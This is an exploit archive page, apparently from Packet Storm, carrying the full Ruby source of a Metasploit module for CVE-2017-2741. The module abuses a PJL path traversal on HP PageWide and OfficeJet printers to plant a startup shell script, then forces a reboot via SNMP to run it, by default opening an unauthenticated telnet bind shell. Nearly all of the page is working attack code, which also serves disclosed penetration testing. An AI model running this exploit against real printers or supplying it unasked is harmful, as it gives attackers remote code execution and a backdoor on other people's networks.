what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

HP Jetdirect Path Traversal Arbitrary Code Execution

HP Jetdirect Path Traversal Arbitrary Code Execution
Posted Aug 27, 2018
Authored by Jacob Baines | Site metasploit.com

This Metasploit module exploits a path traversal via Jetdirect to gain arbitrary code execution by writing a shell script that is loaded on startup to /etc/profile.d. Then, the printer is restarted using SNMP. A large amount of printers are impacted.

tags | exploit, arbitrary, shell, code execution
advisories | CVE-2017-2741
SHA-256 | 6d49ac5c1a048f446f5501a2e5655bb13c4c90e6dff4cd28f9778208c5d72b62

HP Jetdirect Path Traversal Arbitrary Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require "rex/proto/pjl"

class MetasploitModule < Msf::Exploit::Remote

Rank = NormalRanking

include Msf::Exploit::Remote::SNMPClient
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::CmdStager

def initialize(info = {})
super(update_info(info,
'Name' => 'HP Jetdirect Path Traversal Arbitrary Code Execution',
'Description' => %q{
The module exploits a path traversal via Jetdirect to gain arbitrary code execution by
writing a shell script that is loaded on startup to /etc/profile.d. Then, the printer
is restarted using SNMP. Impacted printers:
HP PageWide Managed MFP P57750dw
HP PageWide Managed P55250dw
HP PageWide Pro MFP 577z
HP PageWide Pro 552dw
HP PageWide Pro MFP 577dw
HP PageWide Pro MFP 477dw
HP PageWide Pro 452dw
HP PageWide Pro MFP 477dn
HP PageWide Pro 452dn
HP PageWide MFP 377dw
HP PageWide 352dw
HP OfficeJet Pro 8730 All-in-One Printer
HP OfficeJet Pro 8740 All-in-One Printer
HP OfficeJet Pro 8210 Printer
HP OfficeJet Pro 8216 Printer
HP OfficeJet Pro 8218 Printer

Please read the module documentation regarding the possibility for leaving an
unauthenticated telnetd service running as a side effect of this exploit.
},
'Author' => [
'Jacob Baines', # Python PoC
'Matthew Kienow <matthew_kienow[AT]rapid7.com>', # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-2741' ],
[ 'URL', 'https://support.hp.com/lt-en/document/c05462914' ],
[ 'URL', 'http://tenable.com/blog/rooting-a-printer-from-security-bulletin-to-remote-code-execution' ]
],
'Targets' => [
['Unix (In-Memory)',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' => {
'Compat' => {
'PayloadType' => 'cmd'
}
},
]
],
'Privileged' => true,
'DisclosureDate' => 'Apr 05 2017',
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/bind_busybox_telnetd',
'WfsDelay' => 180
}
))

register_options(
[
Opt::RPORT(Rex::Proto::PJL::DEFAULT_PORT),
OptPort.new('SNMPPORT', [true, 'The SNMP port', 161])
]
)
end

def execute_command(cmd, opts = {})
rpath = '0:/../../rw/var/etc/profile.d/'
stager_script_name = opts[:stager_script_name]
cmd = "(cd / && #{cmd}); rm -f /etc/profile.d/#{stager_script_name}"

begin
# use PJL to write command stager
print_status("Connecting to port #{rport}...")

pjl = Rex::Proto::PJL::Client.new(sock)
pjl.begin_job

pjl.fsinit(rpath[0..1])

print_status("Attempting to write command stager...")
rpath = "#{rpath}#{stager_script_name}"
if pjl.fsdownload(cmd, rpath, is_file: false)
print_good("Successfully wrote command stager to #{rpath}")
else
print_error("Failed to write command stager to #{rpath}")
return
end

# verify command stager exists
unless pjl.fsquery(rpath)
print_error("Command stager does not exist at #{rpath}; aborting...")
return
end

pjl.end_job

rescue Rex::ConnectionError
print_error("Connection Refused")
raise
end
end

def restart_printer
pjl_port = datastore['RPORT']
snmp_port = datastore['SNMPPORT']
community = datastore['COMMUNITY']
# Printer MIB prtGeneralReset object identifier (numeric notation)
prt_general_reset = '1.3.6.1.2.1.43.5.1.1.3.1'
# prtGeneralReset powerCycleReset(4) value
power_cycle_reset = 4

begin
# TODO: Update when there is a clean approach to using two or more mixins that both use RPORT.
datastore['RPORT'] = snmp_port
print_status("Connecting to SNMP port #{rport}...")
snmp = connect_snmp

# get value of Printer MIB prtGeneralReset
reset_value = snmp.get_value(prt_general_reset)
reset_value = "''" if reset_value.is_a?(SNMP::Null)
print_status("Initial value of prtGeneralReset OID #{prt_general_reset} => #{reset_value}")

# set value of Printer MIB prtGeneralReset to powerCycleReset(4)
print_status("Attempting to restart printer via SNMP...")
varbind = SNMP::VarBind.new(prt_general_reset, SNMP::Integer.new(power_cycle_reset))
response = snmp.set(varbind)

if response.error_status == :noError
print_status("Set prtGeneralReset OID #{prt_general_reset} => #{power_cycle_reset}")

# get value of Printer MIB prtGeneralReset
reset_value = snmp.get_value(prt_general_reset)
reset_value = "''" if reset_value.is_a?(SNMP::Null)
print_status("Current value of prtGeneralReset OID #{prt_general_reset} => #{reset_value}")
print_status("Printer restarting...")

else
print_error("Unable to set prtGeneralReset; SNMP response error status: #{response.error_status}")
end

rescue SNMP::RequestTimeout
print_error("SNMP request timeout with community '#{community}'")
raise
rescue SNMP::UnsupportedVersion
print_error("Unsupported SNMP version specified; use '1' or '2c'")
raise
rescue Rex::ConnectionError
print_error("Connection Refused")
raise
ensure
# restore original rport value
datastore['RPORT'] = pjl_port
end
end

def exploit
begin
opts = {
stager_script_name: "#{Rex::Text.rand_text_alpha(8)}.sh"
}

print_status("Exploiting...")
connect
if target.name =~ /Unix/
execute_command(payload.encoded, opts)
else
execute_cmdstager(opts)
end
restart_printer

return
ensure
disconnect
end
end

end
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    0 Files
  • 9
    Sep 9th
    0 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    0 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close